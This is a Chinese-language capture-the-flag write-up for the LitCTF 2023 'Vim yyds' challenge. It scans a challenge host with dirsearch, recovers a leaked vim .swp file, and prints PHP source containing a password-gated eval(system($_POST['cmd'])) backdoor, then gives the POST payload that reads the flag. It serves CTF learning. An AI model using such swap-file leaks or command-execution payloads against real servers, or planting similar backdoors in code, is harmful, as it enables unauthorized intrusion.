[LitCTF 2023]Vim yyds

[LitCTF 2023]Vim yyds wp

题目页面如下:

在这里插入图片描述

搜索一番,没有发现任何信息。题目描述中说到了源码泄露,那么先进行目录扫描。

dirsearch 目录扫描

命令:

dirsearch -u "http://node4.anna.nssctf.cn:28588/"

返回结果:

在这里插入图片描述

在结果中发现一个 .index.php.swp 文件。

直接访问该文件将其下载下来。

关于 .swp 文件

.swp 文件一般是 vim 编辑器在编辑文件时产生的,当用 vim 编辑器编辑文件时就会产生,正常退出时 .swp 文件被删除,但是如果直接叉掉(非正常退出),那么 .swp 文件就会被保留。

使用 vim 编辑器恢复 .swp 交换文件

可以参考:VIM学习笔记 交换文件(swap)

自动检索当前目录下的交换文件:
vim -r

在这里插入图片描述

因为该文件中的信息显示原文件是在 /d/CTF/LitCTF/vim/index.php 目录下,为了进行后面的操作,我们先创建一个 /d/CTF/LitCTF/vim/index.php 目录。(或许也有其他的方法)

恢复交换文件
vim -r index.php.swp

按照提示操作后,index.php.swp 文件的内容会被恢复到 /d/CTF/LitCTF/vim/index.php 文件中

这里仅展示 index.php.swp 文件中的 PHP 代码部分:

<?php
error_reporting(0);
$password = "Give_Me_Your_Flag";
echo "<p>can can need Vim </p>";
if ($_POST['password'] === base64_encode($password)) {
    echo "<p>Oh You got my password!</p>";
    eval(system($_POST['cmd']));
}
?>

payload

很简单,只需要 POST 传参 password 等于字符串 “Give_Me_Your_Flag” base64 加密后的值即可。

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag

拿到 flag :

在这里插入图片描述

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2023-12-31 07:40:02       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-31 07:40:02       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2023-12-31 07:40:02       18 阅读
  4. 通过文章id递归查询所有评论(xml)

    2023-12-31 07:40:02       20 阅读

热门阅读

  1. mysql压力测试原因与mysql压力测试的方法

    2023-12-31 07:40:02       37 阅读
  2. Android Audio实战——AudioTrack分析(二十六)

    2023-12-31 07:40:02       37 阅读
  3. k8s学习 — (实践)第五章 服务发现

    2023-12-31 07:40:02       33 阅读
  4. 图像去噪opencv

    2023-12-31 07:40:02       44 阅读
  5. 云计算基础、Issa、Pssa、Saas区别

    2023-12-31 07:40:02       28 阅读
  6. 编程新手IDE

    2023-12-31 07:40:02       34 阅读